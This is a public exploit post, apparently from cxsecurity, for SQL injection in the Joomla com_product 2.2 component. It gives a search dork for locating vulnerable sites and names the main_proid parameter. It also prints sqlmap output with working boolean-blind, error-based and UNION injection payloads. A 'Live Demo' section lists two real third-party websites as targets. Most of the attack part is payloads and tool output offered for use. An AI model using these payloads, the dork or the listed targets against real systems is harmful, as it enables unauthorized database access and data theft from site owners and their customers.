Joomla com_product 2.2 SQL injection Vulnerability

Published
Credit
Risk
2017.03.11
xBADGIRL21
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: inurl:index.php?option=com_product

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Joomla com_product 2.2 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_product
# version : 2.2
# Tested on: [WIN7]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 10-03-2017
# video Proof : https://youtu.be/nxtkKvz6wrY
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
#|X|B|A|D|G|I|R|L|2|1|
######################
# [+] Poc :
######################
# [main_proid] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10
######################
# [+] SQLmap PoC:
######################
Parameter: main_proid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: main_proid=10 AND 2715=2715

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: main_proid=10 AND (SELECT 7268 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(7268=7268,1))),0x7171717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: main_proid=10 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7747466f6c77734d4f614a62786d4a646b7257686c71464173706c6d4f4d6c644a67507765454954,0x7171717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- umHw
---
# GET parameter 'main_proid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
######################
# [!] Live Demo :
######################
# http://www.powerbear.ae/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10
# http://www.germandistribution.com/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien

References:

https://youtu.be/nxtkKvz6wrY


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com